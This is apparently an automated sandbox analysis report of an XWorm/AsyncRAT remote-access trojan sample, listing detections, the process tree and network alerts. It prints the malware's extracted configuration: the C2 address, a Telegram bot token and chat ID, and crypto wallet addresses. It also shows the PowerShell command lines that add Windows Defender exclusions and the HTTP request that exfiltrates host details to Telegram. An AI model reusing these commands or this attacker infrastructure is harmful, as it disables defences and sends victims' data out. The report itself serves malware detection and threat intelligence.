Edit tour

Windows Analysis Report
z0LTqIdZ4A.exe

Overview

General Information

Sample name:	z0LTqIdZ4A.exe renamed because original name is a hash value
Original sample name:	67183ea2fdfbaace4c265de91e218c59.exe
Analysis ID:	1429112
MD5:	67183ea2fdfbaace4c265de91e218c59
SHA1:	a66c33b7d7d27bc5153f53d672b2f7c7d36c2ae8
SHA256:	3f1e8e3609e6ffd53453d5ce0ca33dc7eaf06e55085d7f6c43d0c4b6df1f974f
Tags:	32AsyncRATexetrojan
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

z0LTqIdZ4A.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\z0LTqIdZ4A.exe" MD5: 67183EA2FDFBAACE4C265DE91E218C59)

powershell.exe (PID: 6184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'z0LTqIdZ4A.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

XClient.exe (PID: 5344 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 67183EA2FDFBAACE4C265DE91E218C59)

XClient.exe (PID: 2080 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 67183EA2FDFBAACE4C265DE91E218C59)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["93.123.39.225"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=6862736136"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
z0LTqIdZ4A.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
z0LTqIdZ4A.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
z0LTqIdZ4A.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xecd9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xed76:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xee8b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe43b:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xecd9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xed76:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xee8b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe43b:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2929213557.0000000002C93000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2929213557.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xead9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb76:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xec8b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe23b:$cnc4: POST / HTTP/1.1
00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x17799:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x17836:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1794b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16efb:$cnc4: POST / HTTP/1.1
Process Memory Space: z0LTqIdZ4A.exe PID: 6520	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.z0LTqIdZ4A.exe.12be9ac0.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.z0LTqIdZ4A.exe.12be9ac0.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xced9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcf76:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xd08b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc63b:$cnc4: POST / HTTP/1.1
0.0.z0LTqIdZ4A.exe.8e0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.z0LTqIdZ4A.exe.8e0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.z0LTqIdZ4A.exe.8e0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xecd9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xed76:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xee8b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe43b:$cnc4: POST / HTTP/1.1
0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xecd9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xed76:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xee8b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe43b:$cnc4: POST / HTTP/1.1
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z0LTqIdZ4A.exe", ParentImage: C:\Users\user\Desktop\z0LTqIdZ4A.exe, ParentProcessId: 6520, ParentProcessName: z0LTqIdZ4A.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', ProcessId: 6184, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z0LTqIdZ4A.exe", ParentImage: C:\Users\user\Desktop\z0LTqIdZ4A.exe, ParentProcessId: 6520, ParentProcessName: z0LTqIdZ4A.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', ProcessId: 6184, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\z0LTqIdZ4A.exe, ProcessId: 6520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\z0LTqIdZ4A.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z0LTqIdZ4A.exe", ParentImage: C:\Users\user\Desktop\z0LTqIdZ4A.exe, ParentProcessId: 6520, ParentProcessName: z0LTqIdZ4A.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe', ProcessId: 6184, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 93.123.39.225 - Destination IP: 192.168.2.4

Timestamp:	04/20/24-23:42:03.597802
SID:	2852870
Source Port:	7000
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 93.123.39.225 - Destination IP: 192.168.2.4

Timestamp:	04/20/24-23:41:58.612970
SID:	2852874
Source Port:	7000
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.4 - Destination IP: 93.123.39.225

Timestamp:	04/20/24-23:42:03.599198
SID:	2852923
Source Port:	49737
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 93.123.39.225

Timestamp:	04/20/24-23:41:15.103401
SID:	2855924
Source Port:	49737
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: z0LTqIdZ4A.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

Avira: detection malicious, Label: HEUR/AGEN.1352371

Found malware configuration

Source: z0LTqIdZ4A.exe

Malware Configuration Extractor: Xworm {"C2 url": ["93.123.39.225"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=6862736136"}

Multi AV Scanner detection for domain / URL

Source: 93.123.39.225

Virustotal: Detection: 20%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Roaming\XClient.exe	Virustotal: Detection: 81%			Perma Link

Multi AV Scanner detection for submitted file

Source: z0LTqIdZ4A.exe	ReversingLabs: Detection: 84%
Source: z0LTqIdZ4A.exe	Virustotal: Detection: 81%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: z0LTqIdZ4A.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: z0LTqIdZ4A.exe	String decryptor: 93.123.39.225
Source: z0LTqIdZ4A.exe	String decryptor: 7000
Source: z0LTqIdZ4A.exe	String decryptor: <123456789>
Source: z0LTqIdZ4A.exe	String decryptor: <Xwormmm>
Source: z0LTqIdZ4A.exe	String decryptor: XSpy By EagleSpy
Source: z0LTqIdZ4A.exe	String decryptor: USB.exe
Source: z0LTqIdZ4A.exe	String decryptor: %AppData%
Source: z0LTqIdZ4A.exe	String decryptor: XClient.exe
Source: z0LTqIdZ4A.exe	String decryptor: TC45o6jXHEojLKaMdGHGtbyD1zVS7HtZtE
Source: z0LTqIdZ4A.exe	String decryptor: 0x479c79C9d0aFC308dE19d2CEa789A1b858f5ADD4
Source: z0LTqIdZ4A.exe	String decryptor: bc1q7qln4vc7vj8fm8n5y4jtafs0702mwk9nkn4vx3
Source: z0LTqIdZ4A.exe	String decryptor: 6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E
Source: z0LTqIdZ4A.exe	String decryptor: 6862736136

Source: z0LTqIdZ4A.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: z0LTqIdZ4A.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49737 -> 93.123.39.225:7000
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 93.123.39.225:7000 -> 192.168.2.4:49737
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49737 -> 93.123.39.225:7000
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 93.123.39.225:7000 -> 192.168.2.4:49737

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 93.123.39.225

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: z0LTqIdZ4A.exe, type: SAMPLE
Source: Yara match	File source: 0.0.z0LTqIdZ4A.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 93.123.39.225:7000

Source: global traffic

HTTP traffic detected: GET /bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=6862736136&text=%E2%98%A0%20%5BXSPY%20-%20@RUSSAGENT%20%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFF6BC8E90A1001FE1454%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%206Z46G%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XSpy%20By%20EagleSpy HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	TCP traffic detected without corresponding DNS query: 93.123.39.225
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000001.00000002.1719420293.000001EFD1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1807558417.0000017B42B62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1955490947.000001F710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1838173359.0000017B4B064000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: powershell.exe, 00000001.00000002.1700953818.000001EFC1FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1700953818.000001EFC1D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB44D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1700953818.000001EFC1FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2000377397.000001F76D908000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1726113566.000001EFDA3E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.t
Source: powershell.exe, 00000001.00000002.1700953818.000001EFC1D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1752240202.0000017B32AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1869095239.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2048675831.000001DFB44D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegrP
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: z0LTqIdZ4A.exe, XClient.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=68627
Source: powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2048675831.000001DFB46FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2000377397.000001F76D919000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5n
